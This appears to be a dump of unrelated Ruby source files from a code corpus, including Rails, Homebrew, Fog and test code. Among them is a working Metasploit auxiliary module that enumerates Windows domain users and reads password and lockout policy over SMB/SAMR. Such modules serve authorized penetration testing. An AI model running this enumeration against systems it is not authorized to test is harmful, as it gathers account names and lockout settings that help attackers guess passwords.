assert_equal expected, @cal.as_json
end
end
end
| 30.60479 | 112 | 0.607122 |
ed225e7b315f33961b6a1d4e4dbb3cca5e30b37d | 5,167 | require 'thread'
require 'tempfile'
module ActsAsIndexed #:nodoc:
class Storage
class OldIndexVersion < Exception;end
INDEX_FILE_EXTENSION = '.ind'
TEMP_FILE_EXTENSION = '.tmp'
def initialize(config)
@path = Pathname.new(config.index_file.to_s)
@size_path = @path.join('size')
@prefix_size = config.index_file_depth
@is_windows_filesystem = config.is_windows_filesystem?
prepare
end
# Takes a hash of atoms and adds these to storage.
def add(atoms, count=1)
operate(:+, atoms)
update_record_count(count)
end
# Takes a hash of atoms and removes these from storage.
def remove(atoms)
operate(:-, atoms)
update_record_count(-1)
end
# Takes a string array of atoms names
# return a hash of the relevant atoms.
def fetch(atom_names, start=false)
atoms = ActiveSupport::OrderedHash.new
atom_names.uniq.collect{|a| encoded_prefix(a) }.uniq.each do |prefix|
pattern = @path.join(prefix.to_s).to_s
pattern += '*' if start
pattern += INDEX_FILE_EXTENSION
Pathname.glob(pattern).each do |atom_file|
atom_file.open do |f|
atoms.merge!(Marshal.load(f))
end
end # Pathname.glob
end # atom_names.uniq
atoms
end # fetch.
# Returns the number of records currently stored in this index.
def record_count
@size_path.read.to_i
# This is a bit horrible.
rescue Errno::ENOENT
0
rescue EOFError
0
end
private
# Takes atoms and adds or removes them from the index depending on the
# passed operation.
def operate(operation, atoms)
# ActiveSupport always available?
atoms_sorted = ActiveSupport::OrderedHash.new
# Sort the atoms into the appropriate shards for writing to individual
# files.
atoms.each do |atom_name, records|
(atoms_sorted[encoded_prefix(atom_name)] ||= ActiveSupport::OrderedHash.new)[atom_name] = records
end
atoms_sorted.each do |e_p, atoms|
path = @path.join(e_p.to_s + INDEX_FILE_EXTENSION)
lock_file(path) do
if path.exist?
from_file = path.open do |f|
Marshal.load(f)
end
else
from_file = ActiveSupport::OrderedHash.new
end
atoms = from_file.merge(atoms){ |k,o,n| o.send(operation, n) }
write_file(path) do |f|
Marshal.dump(atoms,f)
end
end # end lock.
end
end
def update_record_count(delta)
lock_file(@size_path) do
new_count = self.record_count + delta
new_count = 0 if new_count < 0
write_file(@size_path) do |f|
f.write(new_count)
end
end
end
def prepare
version_path = @path.join('version')
if @path.exist?
version_path_to_check = Pathname.new(version_path.to_s)
unless version_path_to_check.exist? && version_path_to_check.read == ActsAsIndexed::INDEX_VERSION
raise OldIndexVersion, "Index was created prior to version #{ActsAsIndexed::INDEX_VERSION}. Please delete it, it will be rebuilt automatically."
end
else
@path.mkpath
# Do we need to lock for this? I don't think so as it is only ever
# creating, not modifying.
write_file(version_path) do |f|
f.write(ActsAsIndexed::INDEX_VERSION)
end
end
end
def encoded_prefix(atom)
prefix = atom[0, @prefix_size]
unless (@prefix_cache ||= ActiveSupport::OrderedHash.new).has_key?(prefix)
if atom.length > 1
@prefix_cache[prefix] = prefix.split(//).map{|c| encode_character(c)}.join('_')
else
@prefix_cache[prefix] = encode_character(atom)
end
end
@prefix_cache[prefix]
end
# Allows compatibility with 1.8.6 which has no ord method.
def encode_character(char)
if @@has_ord ||= char.respond_to?(:ord)
char.ord.to_s
else
char[0]
end
end
def write_file(file_path)
temp_file = Tempfile.new(File.basename(file_path.to_s))
begin
yield temp_file
FileUtils.mv(temp_file.path, file_path.to_s)
ensure
temp_file.close
temp_file.unlink
end
end
@@file_lock = Mutex.new
# Borrowed from Rails' ActiveSupport FileStore. Also under MIT licence.
# Lock a file for a block so only one process or thread can modify it at a time.
def lock_file(file_path, &block) # :nodoc:
@@file_lock.synchronize do
# Windows does not support file locking.
if !windows? && file_path.exist?
file_path.open('r+') do |f|
begin
f.flock File::LOCK_EX
yield
ensure
f.flock File::LOCK_UN
end
end
else
yield
end
end
end
# Checking for windows all the time seems costly.
# Write a separate windows storage class, and use it at runtime?
def windows?
@is_windows_filesystem
end
end
end
| 25.835 | 154 | 0.613702 |
7a8861a5ca917cebf3dc5f83b7ba7e08a2ecaed5 | 541 | module Oauth
class Client < ActiveRecord::Base
before_validation :set_application_id, :set_application_secret
class << self
def authenticate(application_id, application_secret)
where("application_id = ? AND set_application_secret = ?", application_id, application_secret)
end
end
private
def set_application_id
self.application_id ||= SecureRandom.urlsafe_base64(16)
end
def set_application_secret
self.application_secret ||= SecureRandom.urlsafe_base64(16)
end
end
end | 25.761905 | 102 | 0.728281 |
d51745a7d42543c268c7f37d9adfb84431588c23 | 352 | def upgrade ta, td, a, d
a["ssl"] = {}
a["ssl"]["certfile"] = ta["ssl"]["certfile"]
a["ssl"]["keyfile"] = ta["ssl"]["keyfile"]
a["ssl"]["generate_certs"] = ta["ssl"]["generate_certs"]
a["ssl"]["insecure"] = ta["ssl"]["insecure"]
return a, d
end
def downgrade ta, td, a, d
a.delete("ssl")
return a, d
end
| 25.142857 | 61 | 0.511364 |
113317e1765b5b88f2796f60fdae39f8cff868f3 | 8,401 | ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
# Exploit mixins should be called first
include Msf::Exploit::Remote::SMB::Client
include Msf::Exploit::Remote::SMB::Client::Authenticated
include Msf::Exploit::Remote::DCERPC
# Scanner mixin should be near last
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'SMB User Enumeration (SAM EnumUsers)',
'Description' => 'Determine what local users exist via the SAM RPC service',
'Author' => 'hdm',
'License' => MSF_LICENSE,
'DefaultOptions' => {
'DCERPC::fake_bind_multi' => false
}
)
deregister_options('RPORT', 'RHOST')
end
def rport
@rport || super
end
def smb_direct
@smbdirect || super
end
# Locate an available SMB PIPE for the specified service
def smb_find_dcerpc_pipe(uuid, vers, pipes)
found_pipe = nil
found_handle = nil
pipes.each do |pipe_name|
connected = false
begin
connect
smb_login
connected = true
handle = dcerpc_handle(
uuid, vers,
'ncacn_np', ["\\#{pipe_name}"]
)
dcerpc_bind(handle)
return pipe_name
rescue ::Interrupt => e
raise e
rescue ::Exception => e
raise e if not connected
end
disconnect
end
nil
end
def smb_pack_sid(str)
[1,5,0].pack('CCv') + str.split('-').map{|x| x.to_i}.pack('NVVVV')
end
def smb_parse_sam_domains(data)
ret = []
idx = 0
cnt = data[8, 4].unpack("V")[0]
return ret if cnt == 0
idx += 20
idx += 12 * cnt
1.upto(cnt) do
v = data[idx,data.length].unpack('V*')
l = v[2] * 2
while(l % 4 != 0)
l += 1
end
idx += 12
ret << data[idx, v[2] * 2].gsub("\x00", '')
idx += l
end
ret
end
def smb_parse_sam_users(data)
ret = {}
rid = []
idx = 0
cnt = data[8, 4].unpack("V")[0]
return ret if cnt == 0
idx += 20
1.upto(cnt) do
v = data[idx,12].unpack('V3')
rid << v[0]
idx += 12
end
1.upto(cnt) do
v = data[idx,32].unpack('V*')
l = v[2] * 2
while(l % 4 != 0)
l += 1
end
uid = rid.shift
idx += 12
ret[uid] = data[idx, v[2] * 2].gsub("\x00", '')
idx += l
end
ret
end
@@sam_uuid = '12345778-1234-abcd-ef00-0123456789ac'
@@sam_vers = '1.0'
@@sam_pipes = %W{ SAMR LSARPC NETLOGON BROWSER SRVSVC }
# Fingerprint a single host
def run_host(ip)
[[139, false], [445, true]].each do |info|
@rport = info[0]
@smbdirect = info[1]
sam_pipe = nil
sam_handle = nil
begin
# Find the SAM pipe
sam_pipe = smb_find_dcerpc_pipe(@@sam_uuid, @@sam_vers, @@sam_pipes)
break if not sam_pipe
# Connect4
stub =
NDR.uwstring("\\\\" + ip) +
NDR.long(2) +
NDR.long(0x30)
dcerpc.call(62, stub)
resp = dcerpc.last_response ? dcerpc.last_response.stub_data : nil
if ! (resp and resp.length == 24)
print_error("Invalid response from the Connect5 request")
disconnect
return
end
phandle = resp[0,20]
perror = resp[20,4].unpack("V")[0]
if(perror == 0xc0000022)
disconnect
return
end
if(perror != 0)
print_error("Received error #{"0x%.8x" % perror} from the OpenPolicy2 request")
disconnect
return
end
# EnumDomains
stub = phandle + NDR.long(0) + NDR.long(8192)
dcerpc.call(6, stub)
resp = dcerpc.last_response ? dcerpc.last_response.stub_data : nil
domlist = smb_parse_sam_domains(resp)
domains = {}
# LookupDomain
domlist.each do |domain|
next if domain == 'Builtin'
# Round up the name to match NDR.uwstring() behavior
dlen = (domain.length + 1) * 2
# The SAM functions are picky on Windows 2000
stub =
phandle +
[(domain.length + 0) * 2].pack("v") + # NameSize
[(domain.length + 1) * 2].pack("v") + # NameLen (includes null)
NDR.long(rand(0x100000000)) +
[domain.length + 1].pack("V") + # MaxCount (includes null)
NDR.long(0) +
[domain.length + 0].pack("V") + # ActualCount (ignores null)
Rex::Text.to_unicode(domain) # No null appended
dcerpc.call(5, stub)
resp = dcerpc.last_response ? dcerpc.last_response.stub_data : nil
raw_sid = resp[12, 20]
txt_sid = raw_sid.unpack("NVVVV").join("-")
domains[domain] = {
:sid_raw => raw_sid,
:sid_txt => txt_sid
}
end
# OpenDomain, QueryDomainInfo, CloseDomain
domains.each_key do |domain|
# Open
stub =
phandle +
NDR.long(0x00000305) +
NDR.long(4) +
[1,4,0].pack('CvC') +
domains[domain][:sid_raw]
dcerpc.call(7, stub)
resp = dcerpc.last_response ? dcerpc.last_response.stub_data : nil
dhandle = resp[0,20]
derror = resp[20,4].unpack("V")[0]
# Catch access denied replies to OpenDomain
if(derror != 0)
next
end
# Password information
stub = dhandle + [0x01].pack('v')
dcerpc.call(8, stub)
resp = dcerpc.last_response ? dcerpc.last_response.stub_data : nil
if(resp and resp[-4,4].unpack('V')[0] == 0)
mlen,hlen = resp[8,4].unpack('vv')
domains[domain][:pass_min] = mlen
domains[domain][:pass_min_history] = hlen
end
# Server Role
stub = dhandle + [0x07].pack('v')
dcerpc.call(8, stub)
if(resp and resp[-4,4].unpack('V')[0] == 0)
resp = dcerpc.last_response ? dcerpc.last_response.stub_data : nil
domains[domain][:server_role] = resp[8,2].unpack('v')[0]
end
# Lockout Threshold
stub = dhandle + [12].pack('v')
dcerpc.call(8, stub)
resp = dcerpc.last_response ? dcerpc.last_response.stub_data : nil
if(resp and resp[-4,4].unpack('V')[0] == 0)
lduration = resp[8,8]
lwindow = resp[16,8]
lthresh = resp[24, 2].unpack('v')[0]
domains[domain][:lockout_threshold] = lthresh
domains[domain][:lockout_duration] = Rex::Proto::SMB::Utils.time_smb_to_unix(*(lduration.unpack('V2')))
domains[domain][:lockout_window] = Rex::Proto::SMB::Utils.time_smb_to_unix(*(lwindow.unpack('V2')))
end
# Users
stub = dhandle + NDR.long(0) + NDR.long(0x10) + NDR.long(1024*1024)
dcerpc.call(13, stub)
resp = dcerpc.last_response ? dcerpc.last_response.stub_data : nil
if(resp and resp[-4,4].unpack('V')[0] == 0)
domains[domain][:users] = smb_parse_sam_users(resp)
end
# Close Domain
dcerpc.call(1, dhandle)
end
# Close Policy
dcerpc.call(1, phandle)
domains.each_key do |domain|
# Delete the no longer used raw SID value
domains[domain].delete(:sid_raw)
# Store the domain name itself
domains[domain][:name] = domain
# Store the domain information
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'smb.domain.enumusers',
:data => domains[domain]
)
users = domains[domain][:users] || {}
extra = ""
if (domains[domain][:lockout_threshold])
extra = "( "
extra << "LockoutTries=#{domains[domain][:lockout_threshold]} "
extra << "PasswordMin=#{domains[domain][:pass_min]} "
extra << ")"
end
print_good("#{domain.upcase} [ #{users.keys.map{|k| users[k]}.join(", ")} ] #{extra}")
end
# cleanup
disconnect
return
rescue ::Timeout::Error
rescue ::Interrupt
raise $!
rescue ::Rex::ConnectionError
rescue ::Rex::Proto::SMB::Exceptions::LoginError
next
rescue ::Exception => e
print_line("Error: #{ip} #{e.class} #{e}")
end
end
end
end
| 25.077612 | 114 | 0.549577 |
18ae8bc6b99908c494890c9f466cf979e7d04295 | 1,557 | module Fog
module Storage
class GoogleXML
class Real
# Get an expiring object url from Google Storage for putting an object
#
# ==== Parameters
# * bucket_name<~String> - Name of bucket containing object
# * object_name<~String> - Name of object to get expiring url for
# * expires<~Time> - An expiry time for this url
#
# ==== Returns
# * response<~Excon::Response>:
# * body<~String> - url for object
#
def put_object_url(bucket_name, object_name, expires, headers = {})
raise ArgumentError.new("bucket_name is required") unless bucket_name
raise ArgumentError.new("object_name is required") unless object_name
https_url({
:headers => headers,
:host => @host,
:method => "PUT",
:path => "#{bucket_name}/#{object_name}"
}, expires)
end
end
class Mock
def put_object_url(bucket_name, object_name, expires, headers = {})
raise ArgumentError.new("bucket_name is required") unless bucket_name
raise ArgumentError.new("object_name is required") unless object_name
https_url({
:headers => headers,
:host => @host,
:method => "PUT",
:path => "#{bucket_name}/#{object_name}"
}, expires)
end
end
end
end
end
| 36.209302 | 79 | 0.517662 |
394770a45c36b3b8d1e4e8a2b7e4185081671851 | 911 | require 'chefspec'
require 'chefspec/berkshelf'
require 'chefspec/cacher'
require 'coveralls'
Coveralls.wear!
RSpec.configure do |config|
config.color = true
config.alias_example_group_to :describe_recipe, type: :recipe
config.filter_run :focus
config.run_all_when_everything_filtered = true
Kernel.srand config.seed
config.order = :random
if config.files_to_run.one?
config.default_formatter = 'doc'
end
config.expect_with :rspec do |expectations|
expectations.syntax = :expect
end
config.mock_with :rspec do |mocks|
mocks.syntax = :expect
mocks.verify_partial_doubles = true
end
end
at_exit { ChefSpec::Coverage.report! }
RSpec.shared_context 'recipe tests', type: :recipe do
let(:chef_run) { ChefSpec::SoloRunner.new(node_attributes).converge(described_recipe) }
def node_attributes
{
platform: 'ubuntu',
version: '12.04'
}
end
end
| 20.704545 | 89 | 0.732162 |
bf615b1fe50a30d05c6125a1297aff2400174276 | 1,557 | #
# Be sure to run `pod lib lint XYHelpKit.podspec' to ensure this is a
# valid spec before submitting.
#
# Any lines starting with a # are optional, but their use is encouraged
# To learn more about a Podspec see https://guides.cocoapods.org/syntax/podspec.html
#
Pod::Spec.new do |s|
s.name = 'XYHelpKit'
s.version = '0.2.0'
s.summary = 'XYHelpKit.'
# This description is used to generate tags and improve search results.
# * Think: What does it do? Why did you write it? What is the focus?
# * Try to keep it short, snappy and to the point.
# * Write the description between the DESC delimiters below.
# * Finally, don't worry about the indent, CocoaPods strips it!
s.description = <<-DESC
TODO: Add long description of the pod here.
DESC
s.homepage = 'https://github.com/Gaohc/XYHelpKit.git'
# s.screenshots = 'www.example.com/screenshots_1', 'www.example.com/screenshots_2'
s.license = { :type => 'MIT', :file => 'LICENSE' }
s.author = { 'gaohongcheng' => '[email protected]' }
s.source = { :git => 'https://github.com/Gaohc/XYHelpKit.git', :tag => s.version.to_s }
# s.social_media_url = 'https://twitter.com/<TWITTER_USERNAME>'
s.ios.deployment_target = '8.0'
s.source_files = 'XYHelpKit/**/*'
# s.resource_bundles = {
# 'XYHelpKit' => ['XYHelpKit/Assets/*.png']
# }
# s.public_header_files = 'Pod/Classes/**/*.h'
# s.frameworks = 'UIKit', 'MapKit'
# s.dependency 'AFNetworking', '~> 2.3'
end
| 36.209302 | 99 | 0.631342 |
28300eb548144c2fe6ca64fdfb44089d505cf6be | 353 | cask 'font-miltonian' do
version :latest
sha256 :no_check
# github.com/google/fonts was verified as official when first introduced to the cask
url 'https://github.com/google/fonts/raw/master/ofl/miltonian/Miltonian-Regular.ttf'
name 'Miltonian'
homepage 'https://www.google.com/fonts/specimen/Miltonian'
font 'Miltonian-Regular.ttf'
end
| 29.416667 | 86 | 0.76204 |
1c6fd6b1a2c7e37d0612c0972d4f6a1b88cd3b9d | 5,149 | class GnomeBuilder < Formula
desc "IDE for GNOME"
homepage "https://wiki.gnome.org/Apps/Builder"
url "https://download.gnome.org/sources/gnome-builder/3.28/gnome-builder-3.28.4.tar.xz"
sha256 "05281f01e66fde8fcd89af53709053583cf74d0ae4ac20b37185664f25396b45"
bottle do
sha256 "b2068860adae8eee244a324fba083aa3bfdefef7962c894c320741802f199ad3" => :high_sierra
sha256 "f0f008cab0a9c58973980c8386b9bf76e1305aa8d934d98b5916b861251fc87d" => :sierra
sha256 "4845a2b8a31cd6eeca400f5216aa806a3521f4640ddf6957de89646cc86abe06" => :el_capitan
end
depends_on "gobject-introspection" => :build
depends_on "pkg-config" => :build
depends_on "meson-internal" => :build
depends_on "ninja" => :build
depends_on "python" => :build
depends_on "dbus"
depends_on "gtk+3"
depends_on "libdazzle"
depends_on "gtksourceview3"
depends_on "json-glib"
depends_on "jsonrpc-glib"
depends_on "template-glib"
depends_on "libpeas"
depends_on "vte3"
depends_on "libxml2"
depends_on "libgit2-glib"
depends_on "gspell"
depends_on "hicolor-icon-theme"
depends_on "adwaita-icon-theme"
# fix sandbox violation and remove unavailable linker option
patch :DATA
needs :cxx11
def install
ENV.cxx11
ENV["DESTDIR"] = ""
args = %W[
--prefix=#{prefix}
-Dwith_git=true
-Dwith_autotools=true
-Dwith_history=true
-Dwith_webkit=false
-Dwith_clang=false
-Dwith_devhelp=false
-Dwith_flatpak=false
-Dwith_sysprof=false
-Dwith_vapi=false
-Dwith_vala_pack=false
-Dwith_qemu=false
-Dwith_safe_path=#{HOMEBREW_PREFIX}/bin:/usr/bin:/bin
]
# prevent sandbox violation
pyver = Language::Python.major_minor_version "python3"
inreplace "src/libide/meson.build",
"install_dir: pygobject_override_dir",
"install_dir: '#{lib}/python#{pyver}/site-packages'"
mkdir "build" do
system "meson", *args, ".."
system "ninja"
system "ninja", "install"
end
# meson-internal gives wrong install_names for dylibs due to their unusual installation location
# create softlinks to fix
ln_s Dir.glob("#{lib}/gnome-builder/*dylib"), lib
end
def post_install
system "#{Formula["glib"].opt_bin}/glib-compile-schemas", "#{HOMEBREW_PREFIX}/share/glib-2.0/schemas"
system "#{Formula["gtk+3"].opt_bin}/gtk3-update-icon-cache", "-f", "-t", "#{HOMEBREW_PREFIX}/share/icons/hicolor"
end
test do
assert_match version.to_s, shell_output("#{bin}/gnome-builder --version")
end
end
__END__
diff --git a/src/libide/meson.build b/src/libide/meson.build
index 055801b..4e29f9d 100644
--- a/src/libide/meson.build
+++ b/src/libide/meson.build
@@ -160,37 +160,6 @@ if get_option('with_editorconfig')
]
endif
-# We want to find the subdirectory to install our override into:
-python3 = find_program('python3')
-
-get_overridedir = '''
-import os
-import sysconfig
-
-libdir = sysconfig.get_config_var('LIBDIR')
-if not libdir:
- libdir = '/usr/lib'
-
-try:
- import gi
- overridedir = gi._overridesdir
-except ImportError:
- purelibdir = sysconfig.get_path('purelib')
- overridedir = os.path.join(purelibdir, 'gi', 'overrides')
-
-if overridedir.startswith(libdir): # Should always be True..
- overridedir = overridedir[len(libdir) + 1:]
-
-print(overridedir)
-'''
-
-ret = run_command([python3, '-c', get_overridedir])
-if ret.returncode() != 0
- error('Failed to determine pygobject overridedir')
-else
- pygobject_override_dir = join_paths(get_option('libdir'), ret.stdout().strip())
-endif
-
install_data('Ide.py', install_dir: pygobject_override_dir)
libide_deps = [
diff --git a/src/plugins/meson.build b/src/plugins/meson.build
index d97d7e3..646e7f3 100644
--- a/src/plugins/meson.build
+++ b/src/plugins/meson.build
@@ -5,10 +5,8 @@ gnome_builder_plugins_sources = ['gnome-builder-plugins.c']
gnome_builder_plugins_args = []
gnome_builder_plugins_deps = [libpeas_dep, libide_plugin_dep, libide_dep]
gnome_builder_plugins_link_with = []
-gnome_builder_plugins_link_deps = join_paths(meson.current_source_dir(), 'plugins.map')
-gnome_builder_plugins_link_args = [
- '-Wl,--version-script,' + gnome_builder_plugins_link_deps,
-]
+gnome_builder_plugins_link_deps = []
+gnome_builder_plugins_link_args = []
subdir('autotools')
subdir('autotools-templates')
@@ -76,7 +74,6 @@ gnome_builder_plugins = shared_library(
gnome_builder_plugins_sources,
dependencies: gnome_builder_plugins_deps,
- link_depends: 'plugins.map',
c_args: gnome_builder_plugins_args,
link_args: gnome_builder_plugins_link_args,
link_with: gnome_builder_plugins_link_with,
diff --git a/src/main.c b/src/main.c
index f3bea6d..8f7eab8 100644
--- a/src/main.c
+++ b/src/main.c
@@ -109,6 +109,9 @@ main (int argc,
/* Setup our gdb fork()/exec() helper */
bug_buddy_init ();
+ /* macOS dbus hack */
+ g_setenv("DBUS_SESSION_BUS_ADDRESS", "launchd:env=DBUS_LAUNCHD_SESSION_BUS_SOCKET", TRUE);
+
/*
* We require a desktop session that provides a properly working
* DBus environment. Bail if for some reason that is not the case.
| 30.64881 | 117 | 0.717227 |
bbb2be1995477eb647a42cc513cbe2a887f7de69 | 2,422 | # frozen_string_literal: true
require "rails"
require "action_controller/railtie"
require "active_record/railtie"
require "active_storage/engine"
require "action_text"
module ActionText
class Engine < Rails::Engine
isolate_namespace ActionText
config.eager_load_namespaces << ActionText
config.action_text = ActiveSupport::OrderedOptions.new
config.action_text.attachment_tag_name = "action-text-attachment"
config.autoload_once_paths = %W(
#{root}/app/helpers
#{root}/app/models
)
initializer "action_text.attribute" do
ActiveSupport.on_load(:active_record) do
include ActionText::Attribute
prepend ActionText::Encryption
end
end
initializer "action_text.asset" do
if Rails.application.config.respond_to?(:assets)
Rails.application.config.assets.precompile += %w( action_text trix )
end
end
initializer "action_text.attachable" do
ActiveSupport.on_load(:active_storage_blob) do
include ActionText::Attachable
def previewable_attachable?
representable?
end
def attachable_plain_text_representation(caption = nil)
"[#{caption || filename}]"
end
def to_trix_content_attachment_partial_path
nil
end
end
end
initializer "action_text.helper" do
%i[action_controller_base action_mailer].each do |abstract_controller|
ActiveSupport.on_load(abstract_controller) do
helper ActionText::Engine.helpers
end
end
end
initializer "action_text.renderer" do
ActiveSupport.on_load(:action_text_content) do
self.default_renderer = Class.new(ActionController::Base).renderer
end
%i[action_controller_base action_mailer].each do |abstract_controller|
ActiveSupport.on_load(abstract_controller) do
around_action do |controller, action|
ActionText::Content.with_renderer(controller, &action)
end
end
end
end
initializer "action_text.system_test_helper" do
ActiveSupport.on_load(:action_dispatch_system_test_case) do
require "action_text/system_test_helper"
include ActionText::SystemTestHelper
end
end
initializer "action_text.configure" do |app|
ActionText::Attachment.tag_name = app.config.action_text.attachment_tag_name
end
end
end
| 27.83908 | 82 | 0.699422 |
7a13067c27e87cb4d3853a1be46dd4d2dab3ebdb | 1,841 | =begin
#Kubernetes
#No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.8.3
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 2.2.3
=end
require 'spec_helper'
require 'json'
require 'date'
# Unit tests for Kubernetes::V1beta1ReplicaSetCondition
# Automatically generated by swagger-codegen (github.com/swagger-api/swagger-codegen)
# Please update as you see appropriate
describe 'V1beta1ReplicaSetCondition' do
before do
# run before each test
@instance = Kubernetes::V1beta1ReplicaSetCondition.new
end
after do
# run after each test
end
describe 'test an instance of V1beta1ReplicaSetCondition' do
it 'should create an instance of V1beta1ReplicaSetCondition' do
expect(@instance).to be_instance_of(Kubernetes::V1beta1ReplicaSetCondition)
end
end
describe 'test attribute "last_transition_time"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "message"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "reason"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "status"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "type"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
end
| 27.477612 | 103 | 0.73384 |
180259df9c18621ad8da7d590d768adc6cb67a2e | 2,030 | # Representation of a Cartfile.resolved entry.
# @see https://github.com/Carthage/Carthage/blob/master/Documentation/Artifacts.md#origin
class CarthageDependency
class << self
# Parses Cartfile.resolved dependency entry, e.g.
# github "CocoaLumberjack/CocoaLumberjack" "3.2.1"
def parse_cartfile_resolved_line(line)
line.strip!
matches = line.match(/^(\w+)\s+\"([^\"]+)\"(\s+\"([^\"]+)\")$/)
return nil if matches.nil?
if matches.length == 5
CarthageDependency.new(origin: matches[1].to_sym, source: matches[2], version: matches[4])
else
nil
end
end
end
attr_reader :origin, :source, :version
def initialize(args)
raise AppError.new, "Expected Symbol for origin '#{args[:origin]}'" unless args[:origin].kind_of? Symbol
raise AppError.new, "Unrecognized origin '#{args[:oriign]}'" unless [:github, :git, :binary].include?(args[:origin])
@origin = args[:origin]
@source = args[:source]
@version = args[:version]
end
def new_version_file
VersionFile.new(version_filepath)
end
# Since one Cartfile.resolved entry may produce multiple differently named frameworks,
# this is an entry point to identifying a framework name.
def guessed_framework_basename
case @origin
when :github
@source.split("/").last
when :git
filename = @source.split("/").last
filename.chomp(".git")
when :binary
filename = @source.split("/").last
filename.chomp(".json")
else
raise AppError.new, "Unrecognized origin '#{@origin}'"
end
end
def version_filename
".#{guessed_framework_basename}.version"
end
def version_filepath
File.join(CARTHAGE_BUILD_DIR, version_filename)
end
def verify_version_in_version_file(version_file)
if @version != version_file.version
raise OutdatedFrameworkBuildError.new(guessed_framework_basename, version_file.version, @version)
end
end
def to_s
"#{@origin.to_s} \"#{@source}\" \"#{@version}\""
end
end
| 29.42029 | 120 | 0.673892 |
791576f8cc3ef9b980a32b794cc9186233830b5f | 50 | module Cfror
module ApplicationHelper
end
end
| 10 | 26 | 0.8 |
0827fabcf0b42e5ff0feb3e62520980aff6a1132 | 964 | module Spec
module Rubygems
def self.setup
Gem.clear_paths
ENV['BUNDLE_PATH'] = nil
ENV['GEM_HOME'] = ENV['GEM_PATH'] = Path.base_system_gems.to_s
ENV['PATH'] = "#{Path.home}/.bundle/bin:#{Path.system_gem_path}/bin:#{ENV['PATH']}"
unless File.exist?("#{Path.base_system_gems}")
FileUtils.mkdir_p(Path.base_system_gems)
puts "running `gem install builder rake fakeweb --no-rdoc --no-ri`"
`gem install builder rake fakeweb --no-rdoc --no-ri`
end
ENV['HOME'] = Path.home.to_s
Gem::DefaultUserInteraction.ui = Gem::SilentUI.new
end
def gem_command(command, args = "", options = {})
if command == :exec && !options[:no_quote]
args = args.gsub(/(?=")/, "\\")
args = %["#{args}"]
end
lib = File.join(File.dirname(__FILE__), '..', '..', 'lib')
%x{#{Gem.ruby} -I#{lib} -rubygems -S gem --backtrace #{command} #{args}}.strip
end
end
end | 32.133333 | 89 | 0.585062 |
4af4789af60c4d28ea0e2baa49acf552bd55a29b | 394 | module Sass
module Tree
# A dynamic node representing a Sass `@warn` statement.
#
# @see Sass::Tree
class WarnNode < Node
# The expression to print.
# @return [Script::Tree::Node]
attr_accessor :expr
# @param expr [Script::Tree::Node] The expression to print
def initialize(expr)
@expr = expr
super()
end
end
end
end
| 20.736842 | 64 | 0.588832 |
1151c4ee146057cdfc4ce4883c16cf881749eca3 | 523 | require 'middleman-core'
require 'middleman-blog'
require 'week_of_month'
module Middleman
class CalendarExtension < Extension
def initialize(app, options_hash={}, &block)
super
# place in class variable so helpers can access
@@calendar_article = nil
end
helpers do
def calendar(article, blog_name='blog')
@calendar_article = article
@blog_name = blog_name
file = File.join(File.dirname(__FILE__), 'calendar.erb')
ERB.new(File.read(file), 0, '>').result(binding)
end
end
end
end
| 21.791667 | 60 | 0.709369 |
ed1b0f522689264bf03fb2b62d0f343688dc7069 | 3,853 | require "cases/helper"
require "models/post"
require "models/tag"
require "models/author"
require "models/comment"
require "models/category"
require "models/categorization"
require "models/tagging"
module Remembered
extend ActiveSupport::Concern
included do
after_create :remember
protected
def remember; self.class.remembered << self; end
end
module ClassMethods
def remembered; @@remembered ||= []; end
def sample; @@remembered.sample; end
end
end
class ShapeExpression < ActiveRecord::Base
belongs_to :shape, polymorphic: true
belongs_to :paint, polymorphic: true
end
class Circle < ActiveRecord::Base
has_many :shape_expressions, as: :shape
include Remembered
end
class Square < ActiveRecord::Base
has_many :shape_expressions, as: :shape
include Remembered
end
class Triangle < ActiveRecord::Base
has_many :shape_expressions, as: :shape
include Remembered
end
class PaintColor < ActiveRecord::Base
has_many :shape_expressions, as: :paint
belongs_to :non_poly, foreign_key: "non_poly_one_id", class_name: "NonPolyOne"
include Remembered
end
class PaintTexture < ActiveRecord::Base
has_many :shape_expressions, as: :paint
belongs_to :non_poly, foreign_key: "non_poly_two_id", class_name: "NonPolyTwo"
include Remembered
end
class NonPolyOne < ActiveRecord::Base
has_many :paint_colors
include Remembered
end
class NonPolyTwo < ActiveRecord::Base
has_many :paint_textures
include Remembered
end
class EagerLoadPolyAssocsTest < ActiveRecord::TestCase
NUM_SIMPLE_OBJS = 50
NUM_SHAPE_EXPRESSIONS = 100
def setup
generate_test_object_graphs
end
teardown do
[Circle, Square, Triangle, PaintColor, PaintTexture,
ShapeExpression, NonPolyOne, NonPolyTwo].each(&:delete_all)
end
def generate_test_object_graphs
1.upto(NUM_SIMPLE_OBJS) do
[Circle, Square, Triangle, NonPolyOne, NonPolyTwo].map(&:create!)
end
1.upto(NUM_SIMPLE_OBJS) do
PaintColor.create!(non_poly_one_id: NonPolyOne.sample.id)
PaintTexture.create!(non_poly_two_id: NonPolyTwo.sample.id)
end
1.upto(NUM_SHAPE_EXPRESSIONS) do
shape_type = [Circle, Square, Triangle].sample
paint_type = [PaintColor, PaintTexture].sample
ShapeExpression.create!(shape_type: shape_type.to_s, shape_id: shape_type.sample.id,
paint_type: paint_type.to_s, paint_id: paint_type.sample.id)
end
end
def test_include_query
res = ShapeExpression.all.merge!(includes: [ :shape, { paint: :non_poly } ]).to_a
assert_equal NUM_SHAPE_EXPRESSIONS, res.size
assert_queries(0) do
res.each do |se|
assert_not_nil se.paint.non_poly, "this is the association that was loading incorrectly before the change"
